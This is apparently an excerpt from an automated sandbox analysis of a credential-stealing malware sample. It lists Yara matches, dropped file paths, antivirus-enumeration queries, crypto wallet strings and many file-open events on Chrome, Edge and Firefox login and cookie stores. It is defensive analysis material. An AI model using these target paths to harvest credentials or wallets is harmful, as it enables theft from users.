                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: serverBrokerperfMonitor.exe PID: 7580, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: uAsLgsGzSk.exe PID: 7860, type: MEMORYSTR
                                    Source: Yara matchFile source: hz7DzW2Yop.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED
                                    Source: Yara matchFile source: hz7DzW2Yop.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                                    Source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: GA4tjAxxEP
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                    Source: serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.000000000365D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                    Source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
